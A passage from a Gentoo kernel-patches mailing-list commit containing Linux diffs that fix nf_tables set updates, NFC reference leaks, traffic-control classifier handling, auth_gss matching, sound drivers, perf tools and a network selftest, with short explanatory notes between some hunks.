+-		expr = nft_set_elem_expr_alloc(&ctx, set, nla[NFTA_SET_EXPR]);
+-		if (IS_ERR(expr)) {
+-			err = PTR_ERR(expr);
+-			goto err_set_expr_alloc;
+-		}
+-		set->exprs[0] = expr;
+-		set->num_exprs++;
+-	} else if (nla[NFTA_SET_EXPRESSIONS]) {
+-		struct nft_expr *expr;
+-		struct nlattr *tmp;
+-		int left;
+-
+-		if (!(flags & NFT_SET_EXPR)) {
+-			err = -EINVAL;
+-			goto err_set_expr_alloc;
+-		}
+-		i = 0;
+-		nla_for_each_nested(tmp, nla[NFTA_SET_EXPRESSIONS], left) {
+-			if (i == NFT_SET_EXPR_MAX) {
+-				err = -E2BIG;
+-				goto err_set_expr_alloc;
+-			}
+-			if (nla_type(tmp) != NFTA_LIST_ELEM) {
+-				err = -EINVAL;
+-				goto err_set_expr_alloc;
+-			}
+-			expr = nft_set_elem_expr_alloc(&ctx, set, tmp);
+-			if (IS_ERR(expr)) {
+-				err = PTR_ERR(expr);
+-				goto err_set_expr_alloc;
+-			}
+-			set->exprs[i++] = expr;
+-			set->num_exprs++;
+-		}
+-	}
++	err = nft_set_expr_alloc(&ctx, set, nla, set->exprs, &num_exprs, flags);
++	if (err < 0)
++		goto err_set_destroy;
+ 
++	set->num_exprs = num_exprs;
+ 	set->handle = nf_tables_alloc_handle(table);
+ 
+ 	err = nft_trans_set_add(&ctx, NFT_MSG_NEWSET, set);
+@@ -4607,7 +4686,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ err_set_expr_alloc:
+ 	for (i = 0; i < set->num_exprs; i++)
+ 		nft_expr_destroy(&ctx, set->exprs[i]);
+-
++err_set_destroy:
+ 	ops->destroy(set);
+ err_set_init:
+ 	kfree(set->name);
+@@ -5960,7 +6039,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 			return err;
+ 	} else if (set->flags & NFT_SET_TIMEOUT &&
+ 		   !(flags & NFT_SET_ELEM_INTERVAL_END)) {
+-		timeout = set->timeout;
++		timeout = READ_ONCE(set->timeout);
+ 	}
+ 
+ 	expiration = 0;
+@@ -6061,7 +6140,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 		if (err < 0)
+ 			goto err_parse_key_end;
+ 
+-		if (timeout != set->timeout) {
++		if (timeout != READ_ONCE(set->timeout)) {
+ 			err = nft_set_ext_add(&tmpl, NFT_SET_EXT_TIMEOUT);
+ 			if (err < 0)
+ 				goto err_parse_key_end;
+@@ -8977,14 +9056,20 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 				nft_flow_rule_destroy(nft_trans_flow_rule(trans));
+ 			break;
+ 		case NFT_MSG_NEWSET:
+-			nft_clear(net, nft_trans_set(trans));
+-			/* This avoids hitting -EBUSY when deleting the table
+-			 * from the transaction.
+-			 */
+-			if (nft_set_is_anonymous(nft_trans_set(trans)) &&
+-			    !list_empty(&nft_trans_set(trans)->bindings))
+-				trans->ctx.table->use--;
++			if (nft_trans_set_update(trans)) {
++				struct nft_set *set = nft_trans_set(trans);
+ 
++				WRITE_ONCE(set->timeout, nft_trans_set_timeout(trans));
++				WRITE_ONCE(set->gc_int, nft_trans_set_gc_int(trans));
++			} else {
++				nft_clear(net, nft_trans_set(trans));
++				/* This avoids hitting -EBUSY when deleting the table
++				 * from the transaction.
++				 */
++				if (nft_set_is_anonymous(nft_trans_set(trans)) &&
++				    !list_empty(&nft_trans_set(trans)->bindings))
++					trans->ctx.table->use--;
++			}
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_NEWSET, GFP_KERNEL);
+ 			nft_trans_destroy(trans);
+@@ -9206,6 +9291,10 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWSET:
++			if (nft_trans_set_update(trans)) {
++				nft_trans_destroy(trans);
++				break;
++			}
+ 			trans->ctx.table->use--;
+ 			if (nft_trans_set_bound(trans)) {
+ 				nft_trans_destroy(trans);
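
The nf_tables hunks above change what a NEWSET request does when the named set already exists: instead of returning early, the kernel rebuilds the expressions, checks that the new definition matches the old one (nft_set_is_same), and queues an update transaction; on commit only the timeout and garbage-collection interval are republished via WRITE_ONCE, paired with the READ_ONCE added on the element-add path. In userspace terms, re-declaring a set can now adjust its timing parameters in place. A hedged sketch in nft syntax (table and set names are made up):

    nft add set ip filter blackhole '{ type ipv4_addr; flags timeout; timeout 10m; gc-interval 2m; }'
    # Re-running "add set" with the same definition but timeout 30m should now
    # update the live set; a declaration with a different key type still fails
    # with EEXIST.
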
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 9d91087b93992..1fc339084d897 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1497,6 +1497,7 @@ static int nfc_genl_se_io(struct sk_buff *skb, struct genl_info *info)
+ 	u32 dev_idx, se_idx;
+ 	u8 *apdu;
+ 	size_t apdu_len;
++	int rc;
+ 
+ 	if (!info->attrs[NFC_ATTR_DEVICE_INDEX] ||
+ 	    !info->attrs[NFC_ATTR_SE_INDEX] ||
+@@ -1510,25 +1511,37 @@ static int nfc_genl_se_io(struct sk_buff *skb, struct genl_info *info)
+ 	if (!dev)
+ 		return -ENODEV;
+ 
+-	if (!dev->ops || !dev->ops->se_io)
+-		return -ENOTSUPP;
++	if (!dev->ops || !dev->ops->se_io) {
++		rc = -EOPNOTSUPP;
++		goto put_dev;
++	}
+ 
+ 	apdu_len = nla_len(info->attrs[NFC_ATTR_SE_APDU]);
+-	if (apdu_len == 0)
+-		return -EINVAL;
++	if (apdu_len == 0) {
++		rc = -EINVAL;
++		goto put_dev;
++	}
+ 
+ 	apdu = nla_data(info->attrs[NFC_ATTR_SE_APDU]);
+-	if (!apdu)
+-		return -EINVAL;
++	if (!apdu) {
++		rc = -EINVAL;
++		goto put_dev;
++	}
+ 
+ 	ctx = kzalloc(sizeof(struct se_io_ctx), GFP_KERNEL);
+-	if (!ctx)
+-		return -ENOMEM;
++	if (!ctx) {
++		rc = -ENOMEM;
++		goto put_dev;
++	}
+ 
+ 	ctx->dev_idx = dev_idx;
+ 	ctx->se_idx = se_idx;
+ 
+-	return nfc_se_io(dev, se_idx, apdu, apdu_len, se_io_cb, ctx);
++	rc = nfc_se_io(dev, se_idx, apdu, apdu_len, se_io_cb, ctx);
++
++put_dev:
++	nfc_put_device(dev);
++	return rc;
+ }
+ 
+ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+@@ -1551,14 +1564,21 @@ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+ 	subcmd = nla_get_u32(info->attrs[NFC_ATTR_VENDOR_SUBCMD]);
+ 
+ 	dev = nfc_get_device(dev_idx);
+-	if (!dev || !dev->vendor_cmds || !dev->n_vendor_cmds)
++	if (!dev)
+ 		return -ENODEV;
+ 
++	if (!dev->vendor_cmds || !dev->n_vendor_cmds) {
++		err = -ENODEV;
++		goto put_dev;
++	}
++
+ 	if (info->attrs[NFC_ATTR_VENDOR_DATA]) {
+ 		data = nla_data(info->attrs[NFC_ATTR_VENDOR_DATA]);
+ 		data_len = nla_len(info->attrs[NFC_ATTR_VENDOR_DATA]);
+-		if (data_len == 0)
+-			return -EINVAL;
++		if (data_len == 0) {
++			err = -EINVAL;
++			goto put_dev;
++		}
+ 	} else {
+ 		data = NULL;
+ 		data_len = 0;
+@@ -1573,10 +1593,14 @@ static int nfc_genl_vendor_cmd(struct sk_buff *skb,
+ 		dev->cur_cmd_info = info;
+ 		err = cmd->doit(dev, data, data_len);
+ 		dev->cur_cmd_info = NULL;
+-		return err;
++		goto put_dev;
+ 	}
+ 
+-	return -EOPNOTSUPP;
++	err = -EOPNOTSUPP;
++
++put_dev:
++	nfc_put_device(dev);
++	return err;
+ }
+ 
+ /* message building helper */
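
Both NFC handlers above were returning early without dropping the reference taken by nfc_get_device(); the fix routes every exit through a put_dev label so the reference is released exactly once. The shape of that pattern as a self-contained user-space sketch (get_thing()/put_thing() are hypothetical stand-ins, not the NFC API):

    #include <errno.h>
    #include <stdio.h>

    struct thing { int refs; int (*run)(struct thing *); };

    static struct thing *get_thing(struct thing *t) { t->refs++; return t; }
    static void put_thing(struct thing *t) { t->refs--; }

    static int do_op(struct thing *t)
    {
            int rc;

            t = get_thing(t);       /* takes a reference */
            if (!t->run) {
                    rc = -EOPNOTSUPP;
                    goto put;       /* error paths drop the reference too */
            }
            rc = t->run(t);
    put:
            put_thing(t);           /* single release point */
            return rc;
    }

    int main(void)
    {
            struct thing t = { 0, NULL };

            printf("rc=%d refs=%d\n", do_op(&t), t.refs);  /* refs back to 0 */
            return 0;
    }
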
+diff --git a/net/sched/cls_tcindex.c b/net/sched/cls_tcindex.c
+index 1c9eeb98d826e..4bdcbee4bec56 100644
+--- a/net/sched/cls_tcindex.c
++++ b/net/sched/cls_tcindex.c
+@@ -332,7 +332,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		  struct tcindex_filter_result *r, struct nlattr **tb,
+ 		  struct nlattr *est, u32 flags, struct netlink_ext_ack *extack)
+ {
+-	struct tcindex_filter_result new_filter_result, *old_r = r;
++	struct tcindex_filter_result new_filter_result;
+ 	struct tcindex_data *cp = NULL, *oldp;
+ 	struct tcindex_filter *f = NULL; /* make gcc behave */
+ 	struct tcf_result cr = {};
+@@ -401,7 +401,7 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 	err = tcindex_filter_result_init(&new_filter_result, cp, net);
+ 	if (err < 0)
+ 		goto errout_alloc;
+-	if (old_r)
++	if (r)
+ 		cr = r->res;
+ 
+ 	err = -EBUSY;
+@@ -478,14 +478,6 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		tcf_bind_filter(tp, &cr, base);
+ 	}
+ 
+-	if (old_r && old_r != r) {
+-		err = tcindex_filter_result_init(old_r, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+ 	oldp = p;
+ 	r->res = cr;
+ 	tcf_exts_change(&r->exts, &e);
+diff --git a/net/sched/sch_atm.c b/net/sched/sch_atm.c
+index f52255fea652b..4a981ca90b0bf 100644
+--- a/net/sched/sch_atm.c
++++ b/net/sched/sch_atm.c
+@@ -393,10 +393,13 @@ static int atm_tc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 				result = tcf_classify(skb, NULL, fl, &res, true);
+ 				if (result < 0)
+ 					continue;
++				if (result == TC_ACT_SHOT)
++					goto done;
++
+ 				flow = (struct atm_flow_data *)res.class;
+ 				if (!flow)
+ 					flow = lookup_flow(sch, res.classid);
+-				goto done;
++				goto drop;
+ 			}
+ 		}
+ 		flow = NULL;
+diff --git a/net/sched/sch_cbq.c b/net/sched/sch_cbq.c
+index 6568e17c4c634..36db5f6782f2c 100644
+--- a/net/sched/sch_cbq.c
++++ b/net/sched/sch_cbq.c
+@@ -230,6 +230,8 @@ cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+ 		result = tcf_classify(skb, NULL, fl, &res, true);
+ 		if (!fl || result < 0)
+ 			goto fallback;
++		if (result == TC_ACT_SHOT)
++			return NULL;
+ 
+ 		cl = (void *)res.class;
+ 		if (!cl) {
+@@ -250,8 +252,6 @@ cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+ 		case TC_ACT_TRAP:
+ 			*qerr = NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+ 			fallthrough;
+-		case TC_ACT_SHOT:
+-			return NULL;
+ 		case TC_ACT_RECLASSIFY:
+ 			return cbq_reclassify(skb, cl);
+ 		}
+diff --git a/net/sunrpc/auth_gss/auth_gss.c b/net/sunrpc/auth_gss/auth_gss.c
+index 7bb247c51e2f6..2d7b1e03110ae 100644
+--- a/net/sunrpc/auth_gss/auth_gss.c
++++ b/net/sunrpc/auth_gss/auth_gss.c
+@@ -302,7 +302,7 @@ __gss_find_upcall(struct rpc_pipe *pipe, kuid_t uid, const struct gss_auth *auth
+ 	list_for_each_entry(pos, &pipe->in_downcall, list) {
+ 		if (!uid_eq(pos->uid, uid))
+ 			continue;
+-		if (auth && pos->auth->service != auth->service)
++		if (pos->auth->service != auth->service)
+ 			continue;
+ 		refcount_inc(&pos->count);
+ 		return pos;
+@@ -686,6 +686,21 @@ out:
+ 	return err;
+ }
+ 
++static struct gss_upcall_msg *
++gss_find_downcall(struct rpc_pipe *pipe, kuid_t uid)
++{
++	struct gss_upcall_msg *pos;
++	list_for_each_entry(pos, &pipe->in_downcall, list) {
++		if (!uid_eq(pos->uid, uid))
++			continue;
++		if (!rpc_msg_is_inflight(&pos->msg))
++			continue;
++		refcount_inc(&pos->count);
++		return pos;
++	}
++	return NULL;
++}
++
+ #define MSG_BUF_MAXSIZE 1024
+ 
+ static ssize_t
+@@ -732,7 +747,7 @@ gss_pipe_downcall(struct file *filp, const char __user *src, size_t mlen)
+ 	err = -ENOENT;
+ 	/* Find a matching upcall */
+ 	spin_lock(&pipe->lock);
+-	gss_msg = __gss_find_upcall(pipe, uid, NULL);
++	gss_msg = gss_find_downcall(pipe, uid);
+ 	if (gss_msg == NULL) {
+ 		spin_unlock(&pipe->lock);
+ 		goto err_put_ctx;
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index fb9d9e271845d..ddd2625bed90d 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -570,6 +570,21 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		/* Advantech MICA-071 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Advantech"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "MICA-071"),
++		},
++		/* OVCD Th = 1500uA to reliably detect head-phones vs -set */
++		.driver_data = (void *)(BYT_RT5640_IN3_MAP |
++					BYT_RT5640_JD_SRC_JD2_IN4N |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 3e6141d03770f..625977a29d8a8 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -475,19 +475,10 @@ EXPORT_SYMBOL(snd_sof_device_remove);
+ int snd_sof_device_shutdown(struct device *dev)
+ {
+ 	struct snd_sof_dev *sdev = dev_get_drvdata(dev);
+-	struct snd_sof_pdata *pdata = sdev->pdata;
+ 
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+ 		cancel_work_sync(&sdev->probe_work);
+ 
+-	/*
+-	 * make sure clients and machine driver(s) are unregistered to force
+-	 * all userspace devices to be closed prior to the DSP shutdown sequence
+-	 */
+-	sof_unregister_clients(sdev);
+-
+-	snd_sof_machine_unregister(sdev, pdata);
+-
+ 	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE)
+ 		return snd_sof_shutdown(sdev);
+ 
+diff --git a/sound/soc/sof/intel/hda-dsp.c b/sound/soc/sof/intel/hda-dsp.c
+index 3c76f843454b6..428aee8fd93b1 100644
+--- a/sound/soc/sof/intel/hda-dsp.c
++++ b/sound/soc/sof/intel/hda-dsp.c
+@@ -903,6 +903,78 @@ int hda_dsp_suspend(struct snd_sof_dev *sdev, u32 target_state)
+ 	return snd_sof_dsp_set_power_state(sdev, &target_dsp_state);
+ }
+ 
++static unsigned int hda_dsp_check_for_dma_streams(struct snd_sof_dev *sdev)
++{
++	struct hdac_bus *bus = sof_to_bus(sdev);
++	struct hdac_stream *s;
++	unsigned int active_streams = 0;
++	int sd_offset;
++	u32 val;
++
++	list_for_each_entry(s, &bus->stream_list, list) {
++		sd_offset = SOF_STREAM_SD_OFFSET(s);
++		val = snd_sof_dsp_read(sdev, HDA_DSP_HDA_BAR,
++				       sd_offset);
++		if (val & SOF_HDA_SD_CTL_DMA_START)
++			active_streams |= BIT(s->index);
++	}
++
++	return active_streams;
++}
++
++static int hda_dsp_s5_quirk(struct snd_sof_dev *sdev)
++{
++	int ret;
++
++	/*
++	 * Do not assume a certain timing between the prior
++	 * suspend flow, and running of this quirk function.
++	 * This is needed if the controller was just put
++	 * to reset before calling this function.
++	 */
++	usleep_range(500, 1000);
++
++	/*
++	 * Take controller out of reset to flush DMA
++	 * transactions.
++	 */
++	ret = hda_dsp_ctrl_link_reset(sdev, false);
++	if (ret < 0)
++		return ret;
++
++	usleep_range(500, 1000);
++
++	/* Restore state for shutdown, back to reset */
++	ret = hda_dsp_ctrl_link_reset(sdev, true);
++	if (ret < 0)
++		return ret;
++
++	return ret;
++}
++
++int hda_dsp_shutdown_dma_flush(struct snd_sof_dev *sdev)
++{
++	unsigned int active_streams;
++	int ret, ret2;
++
++	/* check if DMA cleanup has been successful */
++	active_streams = hda_dsp_check_for_dma_streams(sdev);
++
++	sdev->system_suspend_target = SOF_SUSPEND_S3;
++	ret = snd_sof_suspend(sdev->dev);
++
++	if (active_streams) {
++		dev_warn(sdev->dev,
++			 "There were active DSP streams (%#x) at shutdown, trying to recover\n",
++			 active_streams);
++		ret2 = hda_dsp_s5_quirk(sdev);
++		if (ret2 < 0)
++			dev_err(sdev->dev, "shutdown recovery failed (%d)\n", ret2);
++	}
++
++	return ret;
++}
++
+ int hda_dsp_shutdown(struct snd_sof_dev *sdev)
+ {
+ 	sdev->system_suspend_target = SOF_SUSPEND_S3;
+diff --git a/sound/soc/sof/intel/hda.h b/sound/soc/sof/intel/hda.h
+index 2ab3c3840b926..9acd21901e68c 100644
+--- a/sound/soc/sof/intel/hda.h
++++ b/sound/soc/sof/intel/hda.h
+@@ -581,6 +581,7 @@ int hda_dsp_resume(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_suspend(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_resume(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_idle(struct snd_sof_dev *sdev);
++int hda_dsp_shutdown_dma_flush(struct snd_sof_dev *sdev);
+ int hda_dsp_shutdown(struct snd_sof_dev *sdev);
+ int hda_dsp_set_hw_params_upon_resume(struct snd_sof_dev *sdev);
+ void hda_dsp_dump(struct snd_sof_dev *sdev, u32 flags);
+diff --git a/sound/soc/sof/intel/tgl.c b/sound/soc/sof/intel/tgl.c
+index 9ae2890e9dac4..8637fe102c87c 100644
+--- a/sound/soc/sof/intel/tgl.c
++++ b/sound/soc/sof/intel/tgl.c
+@@ -60,7 +60,7 @@ int sof_tgl_ops_init(struct snd_sof_dev *sdev)
+ 	memcpy(&sof_tgl_ops, &sof_hda_common_ops, sizeof(struct snd_sof_dsp_ops));
+ 
+ 	/* probe/remove/shutdown */
+-	sof_tgl_ops.shutdown	= hda_dsp_shutdown;
++	sof_tgl_ops.shutdown	= hda_dsp_shutdown_dma_flush;
+ 
+ 	if (sdev->pdata->ipc_type == SOF_IPC) {
+ 		/* doorbell */
+diff --git a/sound/soc/sof/mediatek/mtk-adsp-common.c b/sound/soc/sof/mediatek/mtk-adsp-common.c
+index 1e0769c668a7b..de8dbe27cd0de 100644
+--- a/sound/soc/sof/mediatek/mtk-adsp-common.c
++++ b/sound/soc/sof/mediatek/mtk-adsp-common.c
+@@ -60,7 +60,7 @@ void mtk_adsp_dump(struct snd_sof_dev *sdev, u32 flags)
+ {
+ 	char *level = (flags & SOF_DBG_DUMP_OPTIONAL) ? KERN_DEBUG : KERN_ERR;
+ 	struct sof_ipc_dsp_oops_xtensa xoops;
+-	struct sof_ipc_panic_info panic_info;
++	struct sof_ipc_panic_info panic_info = {};
+ 	u32 stack[MTK_ADSP_STACK_DUMP_SIZE];
+ 	u32 status;
+ 
+diff --git a/tools/perf/builtin-lock.c b/tools/perf/builtin-lock.c
+index 66520712a1675..470106643ed52 100644
+--- a/tools/perf/builtin-lock.c
++++ b/tools/perf/builtin-lock.c
+@@ -1582,6 +1582,7 @@ static int __cmd_report(bool display_info)
+ 
+ 	/* for lock function check */
+ 	symbol_conf.sort_by_name = true;
++	symbol_conf.allow_aliases = true;
+ 	symbol__init(&session->header.env);
+ 
+ 	if (!perf_session__has_traces(session, "lock record"))
+@@ -1660,6 +1661,7 @@ static int __cmd_contention(int argc, const char **argv)
+ 
+ 	/* for lock function check */
+ 	symbol_conf.sort_by_name = true;
++	symbol_conf.allow_aliases = true;
+ 	symbol__init(&session->header.env);
+ 
+ 	if (use_bpf) {
+diff --git a/tools/perf/util/bpf_counter_cgroup.c b/tools/perf/util/bpf_counter_cgroup.c
+index 3c2df7522f6fc..1c82377ed78b9 100644
+--- a/tools/perf/util/bpf_counter_cgroup.c
++++ b/tools/perf/util/bpf_counter_cgroup.c
+@@ -116,27 +116,19 @@ static int bperf_load_program(struct evlist *evlist)
+ 
+ 			/* open single copy of the events w/o cgroup */
+ 			err = evsel__open_per_cpu(evsel, evsel->core.cpus, -1);
+-			if (err) {
+-				pr_err("Failed to open first cgroup events\n");
+-				goto out;
+-			}
++			if (err == 0)
++				evsel->supported = true;
+ 
+ 			map_fd = bpf_map__fd(skel->maps.events);
+ 			perf_cpu_map__for_each_cpu(cpu, j, evsel->core.cpus) {
+ 				int fd = FD(evsel, j);
+ 				__u32 idx = evsel->core.idx * total_cpus + cpu.cpu;
+ 
+-				err = bpf_map_update_elem(map_fd, &idx, &fd,
+-							  BPF_ANY);
+-				if (err < 0) {
+-					pr_err("Failed to update perf_event fd\n");
+-					goto out;
+-				}
++				bpf_map_update_elem(map_fd, &idx, &fd, BPF_ANY);
+ 			}
+ 
+ 			evsel->cgrp = leader_cgrp;
+ 		}
+-		evsel->supported = true;
+ 
+ 		if (evsel->cgrp == cgrp)
+ 			continue;
+diff --git a/tools/perf/util/cgroup.c b/tools/perf/util/cgroup.c
+index e99b41f9be45a..cd978c240e0dd 100644
+--- a/tools/perf/util/cgroup.c
++++ b/tools/perf/util/cgroup.c
+@@ -224,6 +224,19 @@ static int add_cgroup_name(const char *fpath, const struct stat *sb __maybe_unus
+ 	return 0;
+ }
+ 
++static int check_and_add_cgroup_name(const char *fpath)
++{
++	struct cgroup_name *cn;
++
++	list_for_each_entry(cn, &cgroup_list, list) {
++		if (!strcmp(cn->name, fpath))
++			return 0;
++	}
++
++	/* pretend it was added by ftw() */
++	return add_cgroup_name(fpath, NULL, FTW_D, NULL);
++}
++
+ static void release_cgroup_list(void)
+ {
+ 	struct cgroup_name *cn;
+@@ -242,7 +255,7 @@ static int list_cgroups(const char *str)
+ 	struct cgroup_name *cn;
+ 	char *s;
+ 
+-	/* use given name as is - for testing purpose */
++	/* use given name as is when no regex is given */
+ 	for (;;) {
+ 		p = strchr(str, ',');
+ 		e = p ? p : eos;
+@@ -253,13 +266,13 @@ static int list_cgroups(const char *str)
+ 			s = strndup(str, e - str);
+ 			if (!s)
+ 				return -1;
+-			/* pretend if it's added by ftw() */
+-			ret = add_cgroup_name(s, NULL, FTW_D, NULL);
++
++			ret = check_and_add_cgroup_name(s);
+ 			free(s);
+-			if (ret)
++			if (ret < 0)
+ 				return -1;
+ 		} else {
+-			if (add_cgroup_name("", NULL, FTW_D, NULL) < 0)
++			if (check_and_add_cgroup_name("/") < 0)
+ 				return -1;
+ 		}
+ 
+diff --git a/tools/perf/util/data.c b/tools/perf/util/data.c
+index a7f68c309545d..fc16299c915f9 100644
+--- a/tools/perf/util/data.c
++++ b/tools/perf/util/data.c
+@@ -132,6 +132,7 @@ int perf_data__open_dir(struct perf_data *data)
+ 		file->size = st.st_size;
+ 	}
+ 
++	closedir(dir);
+ 	if (!files)
+ 		return -EINVAL;
+ 
+@@ -140,6 +141,7 @@ int perf_data__open_dir(struct perf_data *data)
+ 	return 0;
+ 
+ out_err:
++	closedir(dir);
+ 	close_dir(files, nr);
+ 	return ret;
+ }
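
perf_data__open_dir() was leaking the DIR handle from opendir(); the two added closedir() calls cover the success and error returns. The same discipline in a standalone form (count_entries() is illustrative, not the perf code):

    #include <dirent.h>
    #include <stdio.h>

    /* Count directory entries; the DIR handle is released on every path. */
    static int count_entries(const char *path)
    {
            DIR *dir = opendir(path);
            int n = 0;

            if (!dir)
                    return -1;
            while (readdir(dir))
                    n++;
            closedir(dir);
            return n;
    }

    int main(void)
    {
            printf("%d entries\n", count_entries("."));
            return 0;
    }
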
+diff --git a/tools/perf/util/dwarf-aux.c b/tools/perf/util/dwarf-aux.c
+index 609ca16715018..623527edeac1e 100644
+--- a/tools/perf/util/dwarf-aux.c
++++ b/tools/perf/util/dwarf-aux.c
+@@ -308,26 +308,13 @@ static int die_get_attr_udata(Dwarf_Die *tp_die, unsigned int attr_name,
+ {
+ 	Dwarf_Attribute attr;
+ 
+-	if (dwarf_attr(tp_die, attr_name, &attr) == NULL ||
++	if (dwarf_attr_integrate(tp_die, attr_name, &attr) == NULL ||
+ 	    dwarf_formudata(&attr, result) != 0)
+ 		return -ENOENT;
+ 
+ 	return 0;
+ }
+ 
+-/* Get attribute and translate it as a sdata */
+-static int die_get_attr_sdata(Dwarf_Die *tp_die, unsigned int attr_name,
+-			      Dwarf_Sword *result)
+-{
+-	Dwarf_Attribute attr;
+-
+-	if (dwarf_attr(tp_die, attr_name, &attr) == NULL ||
+-	    dwarf_formsdata(&attr, result) != 0)
+-		return -ENOENT;
+-
+-	return 0;
+-}
+-
+ /**
+  * die_is_signed_type - Check whether a type DIE is signed or not
+  * @tp_die: a DIE of a type
+@@ -467,9 +454,9 @@ int die_get_data_member_location(Dwarf_Die *mb_die, Dwarf_Word *offs)
+ /* Get the call file index number in CU DIE */
+ static int die_get_call_fileno(Dwarf_Die *in_die)
+ {
+-	Dwarf_Sword idx;
++	Dwarf_Word idx;
+ 
+-	if (die_get_attr_sdata(in_die, DW_AT_call_file, &idx) == 0)
++	if (die_get_attr_udata(in_die, DW_AT_call_file, &idx) == 0)
+ 		return (int)idx;
+ 	else
+ 		return -ENOENT;
+@@ -478,9 +465,9 @@ static int die_get_call_fileno(Dwarf_Die *in_die)
+ /* Get the declared file index number in CU DIE */
+ static int die_get_decl_fileno(Dwarf_Die *pdie)
+ {
+-	Dwarf_Sword idx;
++	Dwarf_Word idx;
+ 
+-	if (die_get_attr_sdata(pdie, DW_AT_decl_file, &idx) == 0)
++	if (die_get_attr_udata(pdie, DW_AT_decl_file, &idx) == 0)
+ 		return (int)idx;
+ 	else
+ 		return -ENOENT;
+diff --git a/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh b/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
+index b5af08af85595..4a110bb01e53e 100755
+--- a/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
++++ b/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
+@@ -18,14 +18,15 @@ readonly V4_ADDR1=10.0.10.2
+ readonly V6_ADDR0=2001:db8:91::1
+ readonly V6_ADDR1=2001:db8:91::2
+ nsid=100
++ret=0
+ 
+ cleanup_v6()
+ {
+     ip netns del me
+     ip netns del peer
+ 
+-    sysctl -w net.ipv4.conf.veth0.ndisc_evict_nocarrier=1 >/dev/null 2>&1
+-    sysctl -w net.ipv4.conf.all.ndisc_evict_nocarrier=1 >/dev/null 2>&1
++    sysctl -w net.ipv6.conf.veth1.ndisc_evict_nocarrier=1 >/dev/null 2>&1
++    sysctl -w net.ipv6.conf.all.ndisc_evict_nocarrier=1 >/dev/null 2>&1
+ }
+ 
+ create_ns()
+@@ -61,7 +62,7 @@ setup_v6() {
+     if [ $? -ne 0 ]; then
+         cleanup_v6
+         echo "failed"
+-        exit
++        exit 1
+     fi
+ 
+     # Set veth2 down, which will put veth1 in NOCARRIER state
+@@ -88,7 +89,7 @@ setup_v4() {
+     if [ $? -ne 0 ]; then
+         cleanup_v4
+         echo "failed"
+-        exit
++        exit 1
+     fi
+ 
+     # Set veth1 down, which will put veth0 in NOCARRIER state
+@@ -115,6 +116,7 @@ run_arp_evict_nocarrier_enabled() {
+ 
+     if [ $? -eq 0 ];then
+         echo "failed"
++        ret=1
+     else
+         echo "ok"
+     fi
+@@ -134,6 +136,7 @@ run_arp_evict_nocarrier_disabled() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v4
+@@ -164,6 +167,7 @@ run_ndisc_evict_nocarrier_enabled() {
+ 
+     if [ $? -eq 0 ];then
+         echo "failed"
++        ret=1
+     else
+         echo "ok"
+     fi
+@@ -182,6 +186,7 @@ run_ndisc_evict_nocarrier_disabled() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v6
+@@ -198,6 +203,7 @@ run_ndisc_evict_nocarrier_disabled_all() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v6
+@@ -218,3 +224,4 @@ if [ "$(id -u)" -ne 0 ];then
+ fi
+ 
+ run_all_tests
++exit $ret


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-07 11:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-07 11:10 UTC (permalink / raw
  To: gentoo-commits

commit:     09615b5d32e7712a6ef2ff3d0bb8a32d64485997
